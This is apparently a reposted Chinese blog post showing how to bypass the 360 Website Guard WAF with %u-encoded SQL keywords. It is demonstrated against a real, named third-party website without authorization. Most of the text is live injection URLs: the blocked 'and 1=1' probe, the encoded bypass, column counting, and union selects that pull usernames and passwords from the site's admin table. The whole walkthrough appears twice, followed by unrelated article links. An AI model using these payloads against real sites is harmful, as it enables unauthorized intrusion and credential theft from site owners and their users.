轻松bypass360网站卫士WAFSQL注入防护
2016-01-23 17:44
661 查看
随便网上找了一个网站,只是测试一下,没有干非法的事情!
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1
被拦截
换一个姿势看看:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=1
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2
成功绕过
上面的描述已经可以证明很多了,还不服嘛?好的,我们来一个完整的绕过过程:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49%20order%20by%205
5个字段,继续:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,2,3,4,5 from admin
已经出来字段了
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,username,3,4,5 from admin
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,password,3,4,5 from admin
成功注射出用户和密码
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1
被拦截
换一个姿势看看:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=1
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2
成功绕过
上面的描述已经可以证明很多了,还不服嘛?好的,我们来一个完整的绕过过程:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49%20order%20by%205
5个字段,继续:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,2,3,4,5 from admin
已经出来字段了
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,username,3,4,5 from admin
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,password,3,4,5 from admin
成功注射出用户和密码
相关文章推荐
- 360网站卫士SQL注入绕过案例一个
- 360网站卫士SQL注入绕过案例一个
- 学IT,看教程,看视频,你必须知道的学习网站
- 网站页脚始终保持底部
- 【架构之路之WCF全析(一)】--服务协定及消息模式
- 化繁为简,无需后端。巧用Yql+rss,搭建我的个人网站
- 建网站需要学习的软件有哪些
- 权重6网站SEO诊断,如何寻找网站流量的突破口
- 网站商务通如何导出查看历史聊天纪录
- GoDaddy开通简体中文网站
- Spark简述及基本架构
- 我的Hexo网站
- Android Audio System 架构初探:库层(一)
- 微博变测试版,各门户网站澄清微博…
- DedeCMS织梦文章内容图片绝对路径修改方法
- Android Audio System 架构初探:Java层
- Android Audio System 架构初探:概述
- 网站怎么做扫码支付接口方便会员充值?
- 全新架构设计
- 【中级篇】LVS+keepalived 高可用负载均衡群集